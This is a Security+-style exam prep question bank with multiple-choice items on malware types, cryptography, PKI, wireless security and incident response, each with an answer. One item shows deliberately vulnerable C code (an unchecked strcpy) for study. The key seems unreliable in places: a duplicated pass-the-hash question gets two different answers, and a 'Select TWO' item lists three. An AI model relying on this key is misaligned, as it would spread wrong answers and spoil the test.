A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed? A. RAT B. Worm C. Ransomware D. Bot
A. RAT
After a user reports slow computer performance, a systems administrator detects a suspicious file, which was installed as part of a freeware software package. The systems administrator reviews the output below: c:\Windows\system32>netstat -nab Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0 RpcSs [svchost.exe] TCP 0.0.0.0:445 0.0.0.0 [svchost.exe] TCP 192.168.1.10:5000 10.37.213.20 winserver.exe UDP 192.168.1.10:1900 *.* SSDPSVR Based on the above information, which of the following types of malware was installed on the user's computer? A. RAT B. Keylogger C. Spyware D. Worm E. Bot
A. RAT
A security auditor is performing a vulnerability scan to find out if mobile applications used in the organization are secure. The auditor discovers that an application has been accessed remotely with no legitimate account credentials. After investigating, it seems that the application has allowed some users to bypass authentication of that application. Which of the following types of malware allow such a compromise to take place? (Select TWO) A. RAT B. Ransomware C. Worm D. Trojan E. Backdoor
A. RAT E. Backdoor
A security administrator must implement a wireless encryption system to secure mobile devices' communication. Some users have mobile devices which only support 56-bit encryption. Which of the following wireless encryption methods should be implemented? A. RC4 B. AES C. MD5 D. TKIP
A. RC4
Ann, a customer, is reporting that several important files are missing from her workstation. She recently received communication from an unknown party who is requesting funds to restore the files. Which of the following attacks has occurred? A. Ransomware B. Keylogger C. Buffer overflow D. Rootkit
A. Ransomware
Some of the legacy systems in an organization are running old versions of the Windows OS and others are running Linux OSs, while new systems are running the latest release of the Windows OS. The systems are not running any legacy custom applications. The organization's Chief Information Officer (CIO) wishes to unify all systems to reduce cost and enhance the security posture of the organization, without losing data or causing data leakage. Which of the following would be the BEST course of action to take? A. Reconfigure all existing machines to have the latest release of Windows OS. B. Restore all machines to default configurations. C. Upgrade part of the legacy systems' infrastructure and perform OS updates. D. Treat all legacy machines as end-of-life systems and replace them.
A. Reconfigure all existing machines to have the latest release of Windows OS.
After a security incident involving a physical asset, which of the following should be done at the beginning? A. Record every person who was in possession of assets, continuing post-incident. B. Create working images of data in the following order: hard drive then RAM. C. Back up storage devices so work can be performed on the devices immediately. D. Write a report detailing the incident and mitigation suggestions.
A. Record every person who was in possession of assets, continuing post-incident.
While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstation from the original media. Joe is about to begin copying the user's files back onto the hard drive. Which of the following incident response steps is Joe working on now? A. Recovery B. Eradication C. Containment D. Identification
A. Recovery
Which of the following allows a company to maintain access to encrypted resources when employee turnover is high? A. Recovery agent B. Certificate authority C. Trust model D. Key escrow
A. Recovery agent
Which of the following BEST describes a network-based attack that can allow an attacker to take full control of a vulnerable host? A. Remote exploit B. Amplification C. Sniffing D. Man-in-the-middle
A. Remote exploit
Which of the following is a compensating control that will BEST reduce the risk of weak passwords? A. Requiring the use of one-time tokens B. Increasing password history retention count C. Disable user accounts after exceeding maximum attempts D. Setting expiration of user passwords to a shorter time
A. Requiring the use of one-time tokens
A computer supply company is located in a building with three wireless networks. The system security team implemented a quarterly security scan and saw the following: SSID State Channel Level Computer AreUs1 connected 1 70 dBm Computer AreUs2 connected 5 80 dBm Computer AreUs3 connected 3 75 dBm Computer AreUs4 connected 6 95 dBm Which of the following is this an example of? A. Rogue access point B. Near field communication C. Jamming D. Packet sniffing
A. Rogue access point
Which of the following is used to certify intermediate authorities in a large PKI deployment? A. Root CA B. Recovery agent C. Root user D. Key escrow
A. Root CA
A technician suspects that a system has been compromised. The technician reviews the following log entry: WARNING - hash mismatch: C:\Window\SysWOW64\user32.dll WARNING - hash mismatch: C:\Window\SysWOW64\kernel32.dll Based solely on the above information, which of the following types of malware is MOST likely installed on the system? A. Rootkit B. Ransomware C. Trojan D. Backdoor
A. Rootkit
A security technician is working with the network firewall team to implement access controls at the company's demarc as part of the initiation of configuration management processes. One of the network technicians asks the security technician to explain the access control type found in a firewall. With which of the following should the security technician respond? A. Rule based access control B. Role based access control C. Discretionary access control D. Mandatory access control
A. Rule based access control
A security consultant is setting up a new electronic messaging platform and wants to ensure the platform supports message integrity validation. Which of the following protocols should the consultant recommend? A. S/MIME B. DNSSEC C. RADIUS D. 802.1X
A. S/MIME
A company is executing a strategy to encrypt and sign all proprietary data in transit. The company recently deployed PKI services to support this strategy. Which of the following protocols supports the strategy and employs certificates generated by PKI? (Select THREE). A. S/MIME B. TLS C. SFTP D. SAML E. SIP F. IPSec G. Kerberos
A. S/MIME B. TLS F. IPSec
Which of the following is used to verify data integrity? A. SHA B. 3DES C. AES D. RSA
A. SHA
A company needs to receive data that contains personally identifiable information. The company requires both the transmission and data at rest to be encrypted. Which of the following achieves this goal? (Select TWO). A. SSH B. TFTP C. NTLM D. TKIP E. SMTP F. PGP/GPG
A. SSH F. PGP/GPG
An organization does not want the wireless network name to be easily discovered. Which of the following software features should be configured on the access points? A. SSID broadcast B. MAC filter C. WPA2 D. Antenna placement
A. SSID broadcast
Users are encouraged to click on a link in an email to obtain exclusive access to the newest version of a popular smartphone. This is an example of: A. Scarcity B. Familiarity C. Intimidation D. Trust
A. Scarcity
Which of the following can a security administrator implement on mobile devices that will help prevent unwanted people from viewing the data if the device is left unattended? A. Screen lock B. Voice encryption C. GPS tracking D. Device encryption
A. Screen lock
Confidential emails from an organization were posted to a website without the organization's knowledge. Upon investigation, it was determined that the emails were obtained from an internal actor who sniffed the emails in plain text. Which of the following protocols, if properly implemented, would have MOST likely prevented the emails from being sniffed? (Select TWO) A. Secure IMAP B. DNSSEC C. S/MIME D. SMTPS E. HTTPS
A. Secure IMAP D. SMTPS
Company A agrees to provide perimeter protection, power, and environmental support with measurable goals for Company B, but will not be responsible for user authentication or patching of operating systems within the perimeter. Which of the following is being described? A. Service level agreement B. Memorandum of understanding C. Business partner agreement D. Interoperability agreement
A. Service level agreement
Human Resources suspects an employee is accessing the employee salary database. The administrator is asked to find out who it is. In order to complete this task, which of the following is a security control that should be in place? A. Shared accounts should be prohibited. B. Account lockout should be enabled C. Privileges should be assigned to groups rather than individuals D. Time of day restrictions should be in use
A. Shared accounts should be prohibited.
A company wants to ensure confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following methods should the technician use? A. Shredding B. Wiping C. Low-level formatting D. Repartitioning E. Overwriting
A. Shredding
An office completed digitizing all its paper records. Joe, the data custodian, has been tasked with the disposal of the paper files, which include: intellectual property, payroll records, financial information, and drug screening results. Which of the following is the BEST way to dispose of these items? A. Shredding B. Pulping C. Deidentifying D. Recycling
A. Shredding
Employee badges are encoded with a private encryption key and specific personal information. The encoding is then used to provide access to the network. Which of the following describes this access control type? A. Smartcard B. Token C. Discretionary access control D. Mandatory access control
A. Smartcard
A company has developed a business critical system for its core automation process with a software vendor. Which of the following can provide access to the source code if the licensor declares bankruptcy? A. Software escrow B. Software code review C. Software change control D. Software configuration management
A. Software escrow
A security technician at a small business is worried about the Layer 2 switches in the network suffering from a DoS style attack caused by staff incorrectly cabling network connections between switches. Which of the following will BEST mitigate the risk if implemented on the switches? A. Spanning tree B. Flood guards C. Access control lists D. Syn flood
A. Spanning tree
Which of the following tunneling configurations is the process of allowing a remote VPN user to access a public network (the Internet) at the same time that the user is allowed to access organizational resources? A. Split-tunneling B. Inline access C. Always-on VPN D. IPSec VPN
A. Split-tunneling
Which of the following encrypts data a single bit at a time? A. Stream cipher B. Steganography C. 3DES D. Hashing
A. Stream cipher
A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct FIRST? A. Survey threat feeds from services inside the same industry. B. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic. C. Conduct an internal audit against industry best practices to perform a qualitative analysis. D. Deploy a UTM solution that receives frequent updates from a trusted industry vendor.
A. Survey threat feeds from services inside the same industry.
Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data? A. Symmetric algorithm B. Hash function C. Digital signature D. Obfuscation
A. Symmetric algorithm
An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Select TWO) A. TACACS+ B. CHAP C. LDAP D. RADIUS E. MSCHAPv2
A. TACACS+ D. RADIUS
An organization has introduced token-based authentication for system administrators due to the risk of password compromise. The tokens have a set of numbers that automatically change every 30 seconds. Which of the following types of authentication mechanism is this? A. TOTP B. Smart card C. CHAP D. HOTP
A. TOTP
In the initial stages of an incident response, Matt, the security administrator, was provided the hard drives in question by the incident manager. Which of the following incident response procedures would he need to perform in order to begin the analysis? (Select TWO). A. Take hashes B. Begin the chain of custody paperwork C. Take screen shots D. Capture the system image E. Decompile suspicious files
A. Take hashes D. Capture the system image E. Decompile suspicious files
Joe, a user, wants to send an encrypted email to Ann. Which of the following will Ann need to use to verify the validity of Joe's certificate? (Select TWO). A. The CA's public key B. Joe's private key C. Ann's public key D. The CA's private key E. Joe's public key F. Ann's private key
A. The CA's public key E. Joe's public key
A security analyst is updating a BIA document. The security analyst notices the support vendor's time to replace a server hard drive went from eight hours to two hours. Given these new metrics, which of the following can be concluded? (Select TWO) A. The MTTR is faster. B. The MTTR is slower. C. The RTO has increased. D. The RTO has decreased. E. The MTTF has increased. F. The MTTF has decreased.
A. The MTTR is faster. D. The RTO has decreased.
A user typically works remotely over the holidays, using a web-based VPN to access corporate resources. A user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the cause? A. The certificate expired B. The browser does not support SSL C. The user's account is locked out D. The VPN software has reached the seat license maximum
A. The certificate expired
Ann, a sales manager, successfully connected her company-issued smartphone to the wireless network in her office without supplying a username/password combination. Upon disconnecting from the wireless network, she attempted to connect her personal tablet computer to the same wireless network and could not connect. Which of the following is MOST likely the reason? A. The company wireless is using a MAC filter. B. The company wireless has SSID broadcast disabled. C. The company wireless is using WEP. D. The company wireless is using WPA2.
A. The company wireless is using a MAC filter.
An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of the following might be identified by the scanner? (Select TWO). A. The firewall is disabled on workstations. B. SSH is enabled on servers. C. Browser homepages have not been customized. D. Default administrator credentials exist on networking hardware. E. The OS is only set to check for updates once a day.
A. The firewall is disabled on workstations. D. Default administrator credentials exist on networking hardware.
An employee workstation with an IP address of 204.211.38.211/24 reports it is unable to submit print jobs to a network printer at 204.211.38.52/24 after a firewall upgrade. The firewall rules are as follows: IP Address Protocol Port Number Action 204.211.38.1/24 ALL ALL Permit 204.211.38.211/24 ALL ALL Permit 204.211.38.52/24 UDP 631 Permit 204.211.38.52/24 TCP 25 DENY A. The permit statement for 204.211.38.52/24 should be changed to TCP port 631 instead of UDP B. The deny statement for 204.211.38.52/24 should be changed to a permit statement C. The permit statement for 204.211.38.52/24 UDP 631 should be changed to UDP 443 instead of 631 D. The permit statement for 204.211.38.211/24 should be changed to TCP port 631 only instead of ALL
A. The permit statement for 204.211.38.52/24 should be changed to TCP port 631 instead of UDP
An organization uses application whitelisting to help prevent zero-day attacks. Malware was recently identified on one client, which was able to run despite the organization's application whitelisting approach. The forensics team has identified the malicious file, conducted a post-incident analysis, and compared this with the original system baseline. The team sees the following output: filename hash (SHA-1) original: winSCP.exe 2d da b1 4a 98 fc f1 98 06 b1 e5 26 b2 df e5 f5 3e cb 83 e1 latest: winSCP.exe a3 4a c2 4b 85 fa f2 dd 0b ba f4 16 b2 df f2 4b 3f ac 4a e1 Which of the following identifies the flaw in the team's application whitelisting approach? A. Their approach uses executable names and not hashes for the whitelist. B. SHA-1 has known collision vulnerabilities and should not be used. C. The original baseline never captured the latest file signature. D. Zero-day attacks require the latest file signatures
A. Their approach uses executable names and not hashes for the whitelist.
Which of the following is the BEST reason for salting a password hash before it is stored in a database? A. To prevent duplicate values from being stored B. To make the password retrieval process very slow C. To protect passwords from being saved in readable format D. To prevent users from using simple passwords for their access credentials
A. To prevent duplicate values from being stored
If Organization A trusts Organization B and Organization B trusts Organization C, then Organization A trusts Organization C. Which of the following PKI concepts is this describing? A. Transitive trust B. Public key trust C. Certificate authority trust D. Domain level trust
A. Transitive trust
Users from two organizations, each with its own PKI, need to begin working together on a joint project. Which of the following would allow the users of the separate PKIs to work together without connection errors? A. Trust model B. Stapling C. Intermediate CA D. Key escrow
A. Trust model
An organization has implemented an IPSec VPN access for remote users. Which of the following IPSec modes would be the MOST secure for this organization to implement? A. Tunnel mode B. Transport mode C. AH-only mode D. ESP-only mode
A. Tunnel mode
A recent spike in virus detections has been attributed to end-users visiting www.compnay.com. The business has an established relationship with an organization using the URL of www.company.com but not with the site that has been causing the infections. Which of the following would BEST describe this type of attack? A. Typo squatting B. Session hijacking C. Cross-site scripting D. Spear phishing
A. Typo squatting
An organization does not have adequate resources to administer its large infrastructure. A security administrator wishes to combine the security controls of some of the network devices in the organization. Which of the following methods would BEST accomplish this goal? A. Unified Threat Management B. Virtual Private Network C. Single sign on D. Role-based management
A. Unified Threat Management
A company has critical systems that are hosted on an end-of-life OS. To maintain operations and mitigate potential vulnerabilities, which of the following BEST accomplishes this objective? A. Use application whitelisting. B. Employ patch management. C. Disable the default administrator account. D. Implement full-disk encryption.
A. Use application whitelisting.
Pete, the system administrator, is reviewing his disaster recovery plans. He wishes to limit the downtime in the event of a disaster, but does not have the budget approval to implement or maintain an offsite location that ensures 99.99% availability. Which of the following would be Pete's BEST option? A. Use hardware already at an offsite location and configure it to be quickly utilized. B. Move the servers and data to another part of the company's main campus from the server room. C. Retain data back-ups on the main campus and establish redundant servers in a virtual environment. D. Move the data back-ups to the offsite location, but retain the hardware on the main campus for redundancy.
A. Use hardware already at an offsite location and configure it to be quickly utilized.
A security consultant wants to see what information can be obtained by banner grabbing the company's web servers. There are more than 100 web servers, and the consultant would like to perform the task and aggregate the information quickly. Which of the following is the MOST time-efficient way to accomplish this task? A. Use nc to establish a connection to each web server. B. Run tcpdump on each web server in the organization. C. Use dig to return results for each web server address. D. Run netstat on each web server in the organization. E. Use ssh to connect to port 80 on each web server.
A. Use nc to establish a connection to each web server.
A company has just adopted the BYOD deployment methodology. The company is unsure how to address the new trend and has requested assistance from a consultant. Given this scenario, which of the following should the consultant recommend? (Select TWO). A. Use password-enabled lock screens. B. Implement an MDM solution. C. Configure time-of-day restrictions. D. Disable personal email. E. Implement application whitelisting. F. Deny access to the corporate portal.
A. Use password-enabled lock screens. B. Implement an MDM solution.
Privilege creep among long-term employees can be mitigated by which of the following procedures? A. User permission reviews B. Mandatory vacations C. Separation of duties D. Job function rotation
A. User permission reviews
A company that processes sensitive information has implemented a BYOD policy and an MDM solution to secure sensitive data that is processed by corporate and personally owned mobile devices. Which of the following should the company implement to prevent sensitive data from being stored on mobile devices? A. VDI B. Storage segmentation C. Containerization D. USB OTG E. Geofencing
A. VDI
Users report the following message appears when browsing to the company's secure site: This website cannot be trusted. Which of the following actions should a security analyst take to resolve these messages? (Select TWO) A. Verify the certificate has not expired on the server B. Ensure the certificate has a .pfx extension on the server C. Update the root certificate into the client computer certificate store D. Install the updated private key on the web server E. Have users clear their browsing history and relaunch the session
A. Verify the certificate has not expired on the server C. Update the root certificate into the client computer certificate store
Jane has recently implemented a new network design at her organization and wishes to passively identify security issues with the new network. Which of the following should Jane perform? A. Vulnerability assessment B. Black box testing C. White box testing D. Penetration testing
A. Vulnerability assessment
A security analyst is reviewing an assessment report that includes software versions, running services, supported encryption algorithms, and permission settings. Which of the following produced the report? A. Vulnerability scanner B. Protocol analyzer C. Network mapper D. Web inspector
A. Vulnerability scanner
A network administrator has been tasked with securing the WLAN. Which of the following cryptographic products would be used to provide the MOST secure environment for the WLAN? A. WPA2 CCMP B. WPA C. WPA with MAC filtering D. WPA2 TKIP
A. WPA2 CCMP
A network administrator at a small office wants to simplify the configuration of mobile clients connecting to an encrypted wireless network. Which of the following should be implemented if the administrator does not want to provide the wireless password or certificate to the employees? A. WPS B. 802.1x C. WPA2-PSK D. TKIP
A. WPS
Mike, a security professional, is tasked with actively verifying the strength of the security controls on a company's live modem pool. Which of the following activities is MOST appropriate? A. War dialing B. War chalking C. War driving D. Bluesnarfing
A. War dialing
Which of the following is characterized by an attacker attempting to map out an organization's staff hierarchy in order to send targeted emails? A. Whaling B. Impersonation C. Privilege escalation D. Spear phishing
A. Whaling
A server dedicated to the storage and processing of sensitive information was compromised with a rootkit and sensitive data was exfiltrated. Which of the following incident response procedures is best suited to restore the server? A. Wipe the storage, reinstall the OS from original media and restore the data from the last known good backup. B. Keep the data partition, restore the OS from the most current backup and run a full system antivirus scan. C. Format the storage and reinstall both the OS and the data from the most current backup. D. Erase the storage, reinstall the OS from most current backup and only restore the data that was not compromised.
A. Wipe the storage, reinstall the OS from original media and restore the data from the last known good backup.
Which of the following attacks would cause all mobile devices to lose their association with corporate access points while the attack is underway? A. Wireless jamming B. Evil twin C. Rogue AP D. Packet sniffing
A. Wireless jamming
A network administrator is reviewing the following IDS logs: ALERT: 192.168.1.20:1027 -> 192.168.1.21:445 malicious payload detected ALERT: 192.168.1.20:1034 -> 192.168.1.21:445 malicious payload detected ALERT: 192.168.1.20:2041 -> 192.168.1.21:445 malicious payload detected ALERT: 192.168.1.20:1165 -> 192.168.1.21:445 malicious payload detected Based on the above information, which of the following types of malware is triggering the IDS? A. Worm B. Logic bomb C. Rootkit D. Backdoor
A. Worm
A security analyst is attempting to break into a client's secure network. The analyst was not given prior information about the client, except for a block of public IP addresses that are currently in use. After network enumeration, the analyst's NEXT step is to perform: A. a gray-box penetration test. B. a risk analysis. C. a vulnerability assessment. D. an external security audit. E. a red team exercise.
A. a gray-box penetration test.
A security administrator wants to implement a logon script that will prevent MITM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task? A. arp -s 192.168.1.1 00-3a-d1-fa-b1-06 B. dig -x@192.168.1.1 mypc.comptia.com C. nmap -A -T4 192.168.1.1 D. tcpdump -lnv host 192.168.1.1 or ether 00:3a:d1:fa:b1:06
A. arp -s 192.168.1.1 00-3a-d1-fa-b1-06
A buffer overflow can result in: A. loss of data caused by unauthorized command execution. B. privilege escalation caused by TPM override. C. reduced key strength due to salt manipulation. D. repeated use of one-time keys.
A. loss of data caused by unauthorized command execution.
Sara, a security analyst, is trying to prove to management what costs they could incur if their customer database was breached. This database contains 250 records with PII. Studies show that the cost per record for a breach is $300. The likelihood that their database would be breached in the next year is only 5%. Which of the following is the ALE that Sara should report to management for a security breach? A. $1,500 B. $3,750 C. $15,000 D. $75,000
B. $3,750
Joe, the system administrator, has been asked to calculate the Annual Loss Expectancy (ALE) for a $5,000 server, which often crashes. In the past year, the server has crashed 10 times, requiring a system reboot to recover with only 10% loss of data or function. Which of the following is the ALE of this server? A. $500 B. $5,000 C. $25,000 D. $50,000
B. $5,000
During a penetration test from the Internet, Jane, the system administrator, was able to establish a connection to an internal router, but not successfully log in to it. Which ports and protocols are MOST likely to be open on the firewall? (Select FOUR). A. 21 B. 22 C. 23 D. 69 E. 3389 F. SSH G. Terminal services H. Rlogin I. Rsync J. Telnet
B. 22 C. 23 F. SSH J. Telnet
A bank has a fleet of aging payment terminals used by merchants for transactional processing. The terminals currently support single DES but require an upgrade in order to be compliant with security standards. Which of the following is likely to be the simplest upgrade to the aging terminals which will improve in-transit protection of transactional data? A. AES B. 3DES C. RC4 D. WPA2
B. 3DES
If two employees are encrypting traffic between them using a single encryption key, which of the following algorithms are they using? A. RSA B. 3DES C. DSA D. SHA-2
B. 3DES
The system administrator is tasked with changing the administrator password across all 2000 computers in the organization. Which of the following should the system administrator implement to accomplish this task? A. A security group B. A group policy C. Key escrow D. Certificate revocation
B. A group policy
Pete, the compliance manager, wants to meet regulations. Pete would like certain ports blocked only on all computers that do credit card transactions. Which of the following should Pete implement to BEST achieve this goal? A. A host-based intrusion prevention system B. A host-based firewall C. Antivirus update system D. A network-based intrusion detection system
B. A host-based firewall
Which of the following risk concepts requires an organization to determine the number of failures per year? A. SLE B. ALE C. MTBF D. Quantitative analysis
B. ALE
Of the following types of testing steps, which focuses on directly scanning a system, using techniques such as port scans, network mapping, and ICMP scans to identify potential weaknesses? A. Operational reconnaissance B. Active reconnaissance C. Passive reconnaissance D. Initial exploitation
B. Active reconnaissance
A member of the human resources department is searching for candidate resumes and encounters the following error message when attempting to access popular job search websites: Site Cannot Be Displayed: Unauthorized Access Policy Violation: Job Search User Group: Retail_Employee_Access Client Address: 10.13.78.145 DNS Server: 10.1.1.9 Proxy IP Address: 10.1.1.29 Contact your systems administrator for assistance Which of the following would resolve this issue without compromising the company's security policies? A. Review the DNS settings and IP address on the employee's computer B. Add the employee to the less restrictive group on the content filter C. Remove the proxy settings from the employee's web browser D. Create an exception for the job search sites in the host-based firewall on the employee's computer
B. Add the employee to the less restrictive group on the content filter
A manufacturing company updates a policy that instructs employees not to enter a secure area in groups and requires each employee to swipe their badge to enter the area. When employees continue to ignore the policy, a mantrap is installed. Which of the following BEST describe the controls that were implemented to address this issue? (Select TWO) A. Detective B. Administrative C. Deterrent D. Physical E. Corrective
B. Administrative D. Physical
After analyzing and correlating activity from multiple sensors, the security administrator has determined that a group of very well organized individuals from an enemy country is responsible for various attempts to breach the company network, through the use of very sophisticated and targeted attacks. Which of the following is this an example of? A. Privilege escalation B. Advanced persistent threat C. Malicious insider threat D. Spear phishing
B. Advanced persistent threat
A company has just completed a vulnerability scan of its servers. A legacy application that monitors the HVAC system in the datacenter presents several challenges, as the application vendor is no longer in business. Which of the following secure network architecture concepts would BEST protect the other company servers if the legacy server were to be exploited? A. Virtualization B. Air gap C. VLAN D. Extranet
B. Air gap
Which of the following is the BEST choice for a security control that represents a preventive and corrective logical control at the same time? A. Security awareness training B. Antivirus C. Firewalls D. Intrusion detection system
B. Antivirus
A small- to medium-sized company wants to block the use of USB devices on its network. Which of the following is the MOST cost effective way for the security analyst to prevent this? A. Implement a DLP system B. Apply a GPO C. Conduct user awareness training D. Enforce the AUP
B. Apply a GPO
A security analyst is inspecting the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports include the following critical-rated vulnerability: Title: Remote Command Execution vulnerability in web server Rating: Critical (CVSS 10.0) Threat actor: any remote user of the web server Confidence: certain Recommendation: apply vendor patches Which of the following actions should the security analyst perform FIRST? A. Escalate the issue to senior management. B. Apply organizational context to the risk rating. C. Organize for urgent out-of-cycle patching. D. Exploit the server to check whether it is a false positive.
B. Apply organizational context to the risk rating.
Joe, a user, has been trying to send Ann, a different user, an encrypted document via email. Ann has not received the attachment but is able to receive the header information. Which of the following is MOST likely preventing Ann from receiving the encrypted file? A. Unencrypted credentials B. Authentication issues C. Weak cipher suite D. Permission issues
B. Authentication issues
A security administrator has just finished creating a hot site for the company. This implementation relates to which of the following concepts? A. Confidentiality B. Availability C. Succession planning D. Integrity
B. Availability
The Quality Assurance team is testing a new third-party-developed application. The Quality Assurance team does not have any experience with the application. Which of the following is the team performing? A. Grey box testing B. Black box testing C. Penetration testing D. White box testing
B. Black box testing
Which of the following describes how Sara, an attacker, can send unwanted advertisements to a mobile device? A. Man-in-the-middle B. Bluejacking C. Bluesnarfing D. Packet sniffing
B. Bluejacking
A security analyst monitors the syslog server and notices the following: pinging 10.25.27.31 with 65500 bytes of data Reply from 10.25.27.31 bytes=65500 time<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 time<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 time<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 time<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 time<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 time<1ms TTL=128 Which of the following attacks is occurring? A. Memory leak B. Buffer overflow C. Null pointer dereference D. Integer overflow
B. Buffer overflow
An analyst is reviewing a simple program for potential security vulnerabilities before it is deployed to a Windows server. Given the following code: void foo (char *bar) { char random_user_input[12]; strcpy (random_user_input, bar); } Which of the following vulnerabilities is present? A. Bad memory pointer B. Buffer overflow C. Integer overflow D. Backdoor
B. Buffer overflow
Which of the following application attacks is used to gain access to SEH? A. Cookie stealing B. Buffer overflow C. Directory traversal D. XML injection
B. Buffer overflow
While opening an email attachment, Pete, a customer, receives an error that the application has encountered an unexpected issue and must be shut down. This could be an example of which of the following attacks? A. Cross-site scripting B. Buffer overflow C. Header manipulation D. Directory traversal
B. Buffer overflow
Which of the following components MUST be trusted by all parties in PKI? A. Key escrow B. CA C. Private key D. Recovery key
B. CA
An access point has been configured for AES encryption but a client is unable to connect to it. Which of the following should be configured on the client to fix this issue? A. WEP B. CCMP C. TKIP D. RC4
B. CCMP
A security administrator wants to implement a biometric system that can produce fewer false positives and negatives. When evaluating different biometric systems, which of the following is the MOST important factor to consider? A. FAR B. CER C. FRR D. ACL E. MFA
B. CER
A security administrator receives an alert from a third-party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be BEST for the security administrator to implement to most efficiently assist with this issue? A. SSL B. CRL C. PKI D. ACL
B. CRL
While troubleshooting a client application connecting to the network, the security administrator notices the following error: Certificate is not valid. Which of the following is the BEST way to check if the digital certificate is valid? A. PKI B. CRL C. CSR D. IPSec
B. CRL
Which of the following devices will help prevent a laptop from being removed from a certain location? A. Device encryption B. Cable locks C. GPS tracking D. Remote data wipes
B. Cable locks
Separation of duties is often implemented between developers and administrators in order to separate which of the following? A. More experienced employees from less experienced employees B. Changes to program code and the ability to deploy to production C. Upper level management users from standard development employees D. The network access layer from the application access layer
B. Changes to program code and the ability to deploy to production
A security administrator needs to address the following audit recommendations for a public-facing SFTP server: Users should be restricted to upload and download files to their own home directories only. Users should not be allowed to use interactive shell login. Which of the following configuration parameters should be implemented? (Select TWO). A. PermitTunnel B. ChrootDirectory C. PermitTTY D. AllowTcpForwarding E. IgnoreRhosts
B. ChrootDirectory C. PermitTTY
Which of the following security concepts would Sara, the security administrator, use to mitigate the risk of data loss? A. Record time offset B. Clean desk policy C. Cloud computing D. Routine log review
B. Clean desk policy
Which of the following does full disk encryption prevent? A. Client side attacks B. Clear text access C. Database theft D. Network-based attacks
B. Clear text access
Which of the following can Pete, a security administrator, use to distribute the processing effort when generating hashes for a password cracking program? A. RAID B. Clustering C. Redundancy D. Virtualization
B. Clustering
A security administrator discovers an image file that has several plain text documents hidden in the file. Which of the following security goals is met by camouflaging data inside of other files? A. Integrity B. Confidentiality C. Steganography D. Availability
B. Confidentiality
Following incident response best practices and processes, a forensic analyst compiles and selects artifacts requested by the legal team for litigation purposes. Given this scenario, which of the following steps should the analyst perform NEXT in the forensic process? A. Recovery procedures B. Containment procedures C. Eradication procedures D. Lessons learned procedures
B. Containment procedures
Pete, a network administrator, is capturing packets on the network and notices that a large amount of the traffic on the LAN is SIP and RTP protocols. Which of the following should he do to segment that traffic from the other traffic? A. Connect the WAP to a different switch. B. Create a voice VLAN. C. Create a DMZ. D. Set the switch ports to 802.1q mode.
B. Create a voice VLAN.
A server with the IP address of 10.10.2.4 has been having intermittent connection issues. The logs show repeated connection attempts from the following IPs: 10.10.3.16 10.10.3.23 212.178.24.26 217.24.94.83 These attempts are overloading the server to the point that it cannot respond to traffic. Which of the following attacks is occurring? A. XSS B. DDoS C. DoS D. Xmas
B. DDoS
During the analysis of a PCAP file, a security analyst noticed several communications with a remote server on port 53. Which of the following protocol types is observed in this traffic? A. FTP B. DNS C. Email D. NetBIOS
B. DNS
You have a user call you from a hotel saying there's an issue with your organization's website and that it looks like it's been compromised. You check it from your workplace and it appears fine. What is a likely cause associated with the user at the hotel? A. Logic bomb B. DNS Poisoning C. Trojan horse D. Evil twin
B. DNS Poisoning
Users at a company report that a popular news website keeps taking them to a web page with derogatory content. This is an example of which of the following? A. Evil twin B. DNS poisoning C. Vishing D. Session hijacking
B. DNS poisoning
A forensic investigator has run into difficulty recovering usable files from a SAN drive. Which of the following SAN features might have caused the problem? A. Storage multipaths B. Deduplication C. iSCSI initiator encryption D. Data snapshots
B. Deduplication
During a routine review of firewall log reports, a security technician notices multiple successful logins for the admin user during unusual hours. The technician contacts the network administrator, who confirms the logins were not related to the administrator's activities. Which of the following is the MOST likely reason for these logins? A. Firewall maintenance service windows were scheduled. B. Default credentials were still in place. C. The entries in the log were caused by the file integrity monitoring system. D. A blue team was conducting a penetration test on the firewall.
B. Default credentials were still in place.
A CSIRT has completed restoration procedures related to a breach of sensitive data and is creating documentation used to improve future response activities and coordination among team members. Which of the following information would be MOST beneficial to include in lessons learned documentation? (Select TWO). A. A summary of approved policy changes based on the outcome of the incident B. Details of any communication challenges that hampered initial response times C. Details of man-hours and related costs associated with the breach, including lost revenue D. Details regarding system restoration activities completed during the response activity E. Suggestions for potential areas of focus during quarterly training activities F. Suggestions of tools that would provide improved monitoring and auditing of system access
B. Details of any communication challenges that hampered initial response times D. Details regarding system restoration activities completed during the response activity
A company's employees were victims of a spear phishing campaign impersonating the CEO. The company would now like to implement a solution to improve the overall security posture by assuring their employees that an email originated from the CEO. Which of the following controls could they implement to BEST meet this goal? A. Spam filter B. Digital signatures C. Antivirus software D. Digital certificates
B. Digital signatures
A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk? A. Enable CHAP B. Disable MD5 C. Enable Kerberos D. Disable PAP
B. Disable MD5
A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk? A. Enable CHAP B. Disable NTLM C. Enable Kerberos D. Disable PAP
B. Disable NTLM
A security technician is attempting to improve the overall security posture of an internal mail server. Which of the following actions would BEST accomplish this goal? A. Monitoring event logs daily B. Disabling unnecessary services C. Deploying a content filter on the network D. Deploying an IDS on the network
B. Disabling unnecessary services
